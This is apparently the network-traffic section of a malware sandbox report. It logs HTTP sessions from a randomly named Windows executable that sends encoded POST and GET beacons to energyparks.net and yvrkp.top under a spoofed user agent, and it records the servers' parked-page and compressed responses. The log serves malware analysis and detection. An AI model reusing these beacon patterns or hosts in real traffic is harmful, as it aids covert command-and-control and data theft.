Nov 11, 2024 08:32:12.134094000 CET	636	IN	Data Raw: 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f Data Ascii: ></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/h
Nov 11, 2024 08:32:12.134129047 CET	1236	IN	Data Raw: 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 92 d0 b8 d1 Data Ascii: _promo-item_type_hosting"><strong class="b-title b-title_size_large-compact"> , VPS  Dedicated</strong><p class="b-text b-parking__promo-description">
Nov 11, 2024 08:32:12.134140968 CET	1236	IN	Data Raw: 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 Data Ascii: b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_none">SSL-
Nov 11, 2024 08:32:12.134390116 CET	424	IN	Data Raw: 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 Data Ascii: ackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return;
Nov 11, 2024 08:32:12.134418011 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 69 66 20 28 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 3e 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 Data Ascii: if ( links[ i ].href.indexOf('?') >= 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; }
Nov 11, 2024 08:32:12.134429932 CET	1155	IN	Data Raw: 20 73 70 61 6e 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 Data Ascii: spans.length; i++) { if ( spans[ i ].className.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49926	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:17.313082933 CET	799	OUT	POST /k47i/ HTTP/1.1 Host: www.energyparks.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.energyparks.net Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.energyparks.net/k47i/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 31 6f 6a 6c 5a 52 73 65 66 65 72 50 6e 56 71 65 58 79 42 46 65 39 61 6b 75 79 6b 2b 61 47 35 2b 73 5a 34 44 39 50 6d 7a 6a 67 37 49 2f 7a 31 77 42 6b 30 49 7a 71 46 37 52 58 47 6b 78 4c 70 4a 68 74 69 56 6d 34 5a 39 56 63 70 68 77 51 64 46 76 77 74 50 39 44 5a 4e 2b 39 73 55 71 59 6b 32 75 68 46 35 62 54 76 53 35 56 64 66 70 51 70 7a 41 56 52 76 51 76 78 2b 73 42 65 6c 76 53 64 4f 78 5a 55 35 74 2f 2f 44 64 32 44 46 34 77 6a 4c 4b 58 4c 77 46 71 31 67 57 5a 30 79 4f 77 73 43 61 7a 6f 54 56 52 65 55 79 57 52 6a 47 4f 67 70 33 67 67 64 46 51 3d 3d Data Ascii: Ir8HUj=wmZkboj32hLN1ojlZRseferPnVqeXyBFe9akuyk+aG5+sZ4D9Pmzjg7I/z1wBk0IzqF7RXGkxLpJhtiVm4Z9VcphwQdFvwtP9DZN+9sUqYk2uhF5bTvS5VdfpQpzAVRvQvx+sBelvSdOxZU5t//Dd2DF4wjLKXLwFq1gWZ0yOwsCazoTVReUyWRjGOgp3ggdFQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49944	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:19.857229948 CET	819	OUT	POST /k47i/ HTTP/1.1 Host: www.energyparks.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.energyparks.net Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.energyparks.net/k47i/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 32 4a 54 6c 65 43 30 65 65 2b 72 4d 69 56 71 65 63 53 42 42 65 39 47 6b 75 33 45 75 5a 30 64 2b 73 38 45 44 38 4c 79 7a 32 67 37 49 6e 44 31 31 50 45 30 39 7a 71 42 5a 52 54 47 6b 78 4c 74 4a 68 73 53 56 6c 50 4e 79 56 4d 70 6a 70 67 64 48 77 41 74 50 39 44 5a 4e 2b 35 45 79 71 62 55 32 70 52 56 35 5a 78 58 52 77 31 64 63 2b 67 70 7a 58 46 52 72 51 76 78 51 73 45 2b 50 76 55 5a 4f 78 59 6b 35 73 72 4c 41 57 32 44 48 38 77 69 30 62 58 4b 6a 4b 59 34 63 5a 72 64 55 4a 44 34 31 57 56 6c 4a 45 67 2f 44 67 57 31 51 62 4a 70 64 36 6a 64 55 65 66 59 66 34 76 76 52 37 63 37 77 4d 55 47 6e 39 35 33 4c 2b 53 30 3d Data Ascii: Ir8HUj=wmZkboj32hLN2JTleC0ee+rMiVqecSBBe9Gku3EuZ0d+s8ED8Lyz2g7InD11PE09zqBZRTGkxLtJhsSVlPNyVMpjpgdHwAtP9DZN+5EyqbU2pRV5ZxXRw1dc+gpzXFRrQvxQsE+PvUZOxYk5srLAW2DH8wi0bXKjKY4cZrdUJD41WVlJEg/DgW1QbJpd6jdUefYf4vvR7c7wMUGn953L+S0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49965	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:22.524729013 CET	10901	OUT	POST /k47i/ HTTP/1.1 Host: www.energyparks.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.energyparks.net Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.energyparks.net/k47i/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 32 4a 54 6c 65 43 30 65 65 2b 72 4d 69 56 71 65 63 53 42 42 65 39 47 6b 75 33 45 75 5a 30 56 2b 76 4f 38 44 39 73 4f 7a 77 51 37 49 75 6a 31 30 50 45 30 67 7a 71 35 64 52 54 4b 53 78 49 46 4a 7a 61 47 56 67 2b 4e 79 62 4d 70 6a 30 51 64 43 76 77 74 67 39 44 49 45 2b 39 6f 79 71 62 55 32 70 53 39 35 50 7a 76 52 38 56 64 66 70 51 6f 79 41 56 52 58 51 76 70 6d 73 45 37 36 76 6c 6c 4f 6f 37 63 35 71 59 6a 41 4a 47 44 42 37 77 69 73 62 58 48 37 4b 59 56 74 5a 75 49 78 4a 43 41 31 56 43 59 4d 59 42 75 64 69 45 5a 35 43 70 77 38 35 43 74 72 63 2f 77 51 72 71 4c 50 74 59 72 69 4c 69 48 4f 70 5a 54 70 6b 55 79 2b 6b 62 74 48 74 41 6d 53 6c 45 31 30 4f 50 56 48 49 41 77 38 6b 51 53 2b 5a 39 6e 73 63 31 67 45 51 52 2b 6d 77 41 4a 4d 62 31 48 75 55 6d 4a 51 6e 39 69 70 45 59 46 64 34 73 46 31 4e 30 73 31 2f 56 45 4f 61 4f 68 4e 6e 48 76 30 4f 77 72 4f 37 65 56 55 54 4f 35 55 4f 48 71 52 63 47 51 4e 48 6b 6c 75 64 58 69 71 77 47 57 54 34 30 4d 4a 6d 39 41 [TRUNCATED] Data Ascii: Ir8HUj=wmZkboj32hLN2JTleC0ee+rMiVqecSBBe9Gku3EuZ0V+vO8D9sOzwQ7Iuj10PE0gzq5dRTKSxIFJzaGVg+NybMpj0QdCvwtg9DIE+9oyqbU2pS95PzvR8VdfpQoyAVRXQvpmsE76vllOo7c5qYjAJGDB7wisbXH7KYVtZuIxJCA1VCYMYBudiEZ5Cpw85Ctrc/wQrqLPtYriLiHOpZTpkUy+kbtHtAmSlE10OPVHIAw8kQS+Z9nsc1gEQR+mwAJMb1HuUmJQn9ipEYFd4sF1N0s1/VEOaOhNnHv0OwrO7eVUTO5UOHqRcGQNHkludXiqwGWT40MJm9AbQvuK3R/Cnr1QyMEZl+dDEvAEcpfeQXdENZYpcMaGao3GE1De3Nt9QsvdN67tOWji4rhQbpCLBE8cppOSrJfHzgpSTKWJ0pieKpj7R1e1qQs4LWEPMWKTfa0eWCCDin4ymRSZitaPmWZ2K79lc/YsVl1boMAY4o1S1+G9u2YtjUm2AKklDEwZXbkz51EjcB4EK6v4hSOQfL7DhO2JqcZpCS3LRBHiWvqRmIEB39DIpgyXMlNA3mxjcHhFrUhKe/A7Occq5sMrsdkAhgNFtVmjnvhZWrKVQPgQv85LuwUpf/5z+SYZH0d4pJKm3xfgjx9poXB8tgjtoowT6MdrdT73hpBRaqyslSnpw++tU4GdHbn00ETvZrh49uLkEa2PStxKQ6hOyJEVkchnuvENGOYHH4ch8HoSlmgPxbJApqqnlcX8+dYF5KwPUzy1DhsmtlYtHVelJzZQRYHzQp6rIA9VotN6r8QPvz4x2hsuUPrLi4+uOMjc85gwBGReOq5muJvqXNOPeqw/ubOcdESRv0m5xVJ7Qs7RkM84JaC/AXuCzzTXftaVSbbTUIpREGNufciL+WWEyVxT1YWuvsKXiiUjovROGpolnyU3xrpVbhM2g7T6Gl5fzfiahXo5VvtUK21p+V8on0+u/U1PhNsRhcOY6CpCnmNB87e/Y [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49986	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:25.069839954 CET	536	OUT	GET /k47i/?Ir8HUj=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.energyparks.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:32:25.492129087 CET	405	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 07:32:25 GMT Content-Type: text/html Content-Length: 265 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 72 38 48 55 6a 3d 39 6b 78 45 59 63 50 4f 30 51 65 33 31 4d 6a 41 46 6e 45 4d 56 50 48 63 6a 6e 57 38 63 6c 68 4a 66 4f 53 56 6e 53 59 63 46 43 52 75 38 50 38 49 31 36 62 6e 70 48 58 30 75 43 70 6a 4a 43 49 4b 68 4d 38 52 58 69 37 36 7a 37 34 6e 7a 38 43 44 33 65 51 35 51 4f 42 6e 34 51 46 54 6f 53 78 46 6b 54 64 6e 37 2b 5a 7a 38 72 63 7a 75 77 77 4f 4f 52 6a 65 6f 31 38 3d 26 67 52 55 30 65 3d 6a 58 46 54 30 34 46 68 76 42 5a 38 6a 30 42 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ir8HUj=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&gRU0e=jXFT04FhvBZ8j0BP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	104.21.14.183	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:31.199103117 CET	781	OUT	POST /9jdk/ HTTP/1.1 Host: www.yvrkp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.yvrkp.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.yvrkp.top/9jdk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 4a 4a 34 77 6e 58 7a 6b 48 6c 42 68 75 2b 52 53 78 30 35 43 67 4b 56 31 35 4e 46 31 38 44 72 75 4f 57 44 2b 67 50 49 48 69 2b 56 52 61 66 52 78 54 45 57 73 36 57 74 59 77 64 73 56 70 72 66 52 63 6a 78 6f 63 4d 30 63 31 77 37 56 74 62 59 50 4f 57 4c 65 64 6a 54 77 38 43 73 6c 50 70 62 4f 58 32 45 78 6a 41 42 69 52 58 39 2f 6f 59 56 62 7a 79 35 58 42 65 45 75 2b 2b 37 58 7a 63 2f 2b 57 4c 2f 76 76 67 48 44 47 68 48 4b 4a 53 67 54 70 71 74 38 6b 72 48 57 75 4c 4c 4f 53 47 38 30 68 63 63 64 35 69 38 55 4e 63 6b 54 75 56 6a 6b 64 55 47 79 51 3d 3d Data Ascii: Ir8HUj=bszTw8BK2bGMUJJ4wnXzkHlBhu+RSx05CgKV15NF18DruOWD+gPIHi+VRafRxTEWs6WtYwdsVprfRcjxocM0c1w7VtbYPOWLedjTw8CslPpbOX2ExjABiRX9/oYVbzy5XBeEu++7Xzc/+WL/vvgHDGhHKJSgTpqt8krHWuLLOSG80hccd5i8UNckTuVjkdUGyQ==
Nov 11, 2024 08:32:32.108701944 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 07:32:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: private X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8UjS6uqrSW%2FxahjoUe92ZfSdwJItXxe27cewLuj5ZkHQ3p1Yezi9MFAH8Ez2Qf2pl8u4Dzqtm3s%2FBvLdai3JovalbBTBfDinyDpArLTjxhEKtMbAMZJSUK1yAeiHxiEp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c96c14c5e8c1e-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=781&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf 9c 94 33 1c a7 52 19 67 d2 98 45 26 ee 45 98 b3 10 69 Data Ascii: 57bXMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R\|mKaP7I#a%aJEo=-sN!@uXjt/d,U3RgE&Ei
Nov 11, 2024 08:32:32.108719110 CET	1155	IN	Data Raw: f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42 9a 2e ae 25 91 7d c6 91 8e b1 4f 21 4d 69 08 29 d4 25 Data Ascii: !a8+O\|{]\|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l\|?Vtq\|Em:p&FD!yj:F41}jX
Nov 11, 2024 08:32:32.337985039 CET	1236	IN	Data Raw: 37 39 35 0d 0a dc 5b 5b 53 14 47 14 7e b7 ca ff b0 b5 1a 2f 24 c3 74 f7 dc 41 79 f1 21 95 aa c4 4a aa cc 93 65 6d cd ce 05 16 67 2f b5 b3 ab f0 90 2a 10 35 a2 31 5e f0 52 2e 78 8b 1a 49 11 89 a0 01 11 35 bf 66 66 76 9f f2 17 52 3d d3 3d db b3 2c Data Ascii: 795[[SG~/$tAy!Jemg/*51^R.xI5ffvR==,,g`7PQGFkwpksQi,UOSI4NG-:s>u53gx'+u$#LF2-X@G&RPHE!)v&,I
Nov 11, 2024 08:32:32.338001966 CET	712	IN	Data Raw: c1 af 33 8d e5 c9 e0 fa ab c6 cc 6c a3 36 19 2c d6 82 f9 f1 5d 89 8a 22 ab 60 fb d7 73 45 80 10 48 10 76 e6 b5 fc a9 e9 60 62 ca 1f bf e2 2d 3e 0b e6 3f f8 f3 4b 8d df ef 05 b5 73 1b 06 66 cd 85 3d 7a 64 8b cc 45 d2 b6 df 77 c9 00 21 a4 48 52 67 Data Ascii: 3l6,]"`sEHv`b->?Ksf=zdEw!HRg'v]"&ioz15=_=gw+uWdUK@VTU%,i]v@ @I@,6</sw`n+"HUrp,?.uf(*X-]bv
Nov 11, 2024 08:32:32.574610949 CET	1236	IN	Data Raw: 39 64 63 0d 0a ec 5d dd 4f 1b 49 12 7f de 95 f6 7f e8 9d ec c6 b6 12 6c e3 0f 8c 1d b0 94 bd 55 74 2b ed 5b a4 bb 87 28 0f 06 0f f6 e8 06 8f e5 19 87 cd d7 09 72 21 40 62 30 39 cc 37 09 61 e1 58 76 01 f3 11 d6 18 6c 63 e9 fe 16 77 cf cc 13 ff c2 Data Ascii: 9dc]OIlUt+[(r!@b097aXvlcw=MfSWw,80zp^LwRT,h^/=TG).W)RZO+ws\<<Gmrc4S8.IHCD9jepD]Du'\n%yi
Nov 11, 2024 08:32:32.574625969 CET	1236	IN	Data Raw: 06 7b 1c f4 60 10 6e 3e 43 6f 57 d0 b3 2d e9 7d 51 3a 3c c6 a8 24 4a ad 90 34 3e 86 d2 69 a9 bc 5f c9 4f 8a 3b 9b e7 c5 54 4f 5f 10 8e 6e c9 6b 93 68 7c 4e fe d7 16 1c 7f 81 61 94 76 ce ce 8b 23 3d 8e be 60 8f 23 de b2 b0 03 77 aa 23 31 ce 33 f4 Data Ascii: {`n>CoW-}Q:<$J4>i_O;TO_nkh\|Nav#=`#w#13#usH;t\|))))}TF9~e]B}rJo:`(n,pA=tDnclmpB%U0KXW5d(B;pv\2<
Nov 11, 2024 08:32:32.574630976 CET	64	IN	Data Raw: b1 cd ae 00 05 36 10 ea 29 55 38 5f 9b 5d e0 22 11 96 b6 5a 78 96 1b b2 d8 c0 53 9b 02 2b ab bc 68 f5 52 be d9 29 f8 3f 00 00 00 ff ff e3 e5 02 00 a8 27 8a aa 4a 6a 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6)U8_]"ZxS+hR)?'Jj0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	104.21.14.183	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:33.741302967 CET	801	OUT	POST /9jdk/ HTTP/1.1 Host: www.yvrkp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.yvrkp.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.yvrkp.top/9jdk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 70 35 34 31 41 44 7a 7a 33 6c 41 71 4f 2b 52 5a 52 30 39 43 67 47 56 31 38 30 43 31 76 6e 72 75 75 6d 44 2f 6c 6a 49 43 69 2b 56 65 36 66 55 38 7a 45 5a 73 36 62 48 59 30 64 73 56 70 50 66 52 65 72 78 6f 74 4d 31 4e 31 77 35 64 4e 62 61 4c 4f 57 4c 65 64 6a 54 77 38 47 4b 6c 50 68 62 53 32 47 45 77 42 34 47 68 52 58 79 72 34 59 56 4b 6a 79 39 58 42 66 6e 75 2f 54 55 58 31 51 2f 2b 55 44 2f 76 62 38 47 4a 47 68 42 4f 4a 54 2b 62 62 33 66 6c 47 4b 58 4a 4d 6e 70 50 68 69 2b 31 6e 52 47 4d 49 44 72 47 4e 34 58 4f 70 63 58 70 65 70 50 70 64 6a 64 62 6b 2f 57 6e 50 39 6f 43 6c 55 53 68 4f 71 34 79 49 34 3d Data Ascii: Ir8HUj=bszTw8BK2bGMUp541ADzz3lAqO+RZR09CgGV180C1vnruumD/ljICi+Ve6fU8zEZs6bHY0dsVpPfRerxotM1N1w5dNbaLOWLedjTw8GKlPhbS2GEwB4GhRXyr4YVKjy9XBfnu/TUX1Q/+UD/vb8GJGhBOJT+bb3flGKXJMnpPhi+1nRGMIDrGN4XOpcXpepPpdjdbk/WnP9oClUShOq4yI4=
Nov 11, 2024 08:32:34.661957026 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 07:32:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: private X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=riHm0gHFXswfLSL3XZr%2FxlXDDqkotqPCrnzNIqWPPvFHAQ7STW95GIaFEilS9LJdZqFb5VFWjg0QLnsjOy9lcd1%2Frw2ZMIPHwFjTNMJUM2VqL97bk5GENDbV2%2F%2FfrCs%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c96d12ccbc32d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=801&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf 9c 94 33 1c a7 52 19 67 d2 98 45 26 Data Ascii: 57bXMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R\|mKaP7I#a%aJEo=-sN!@uXjt/d,U3RgE&
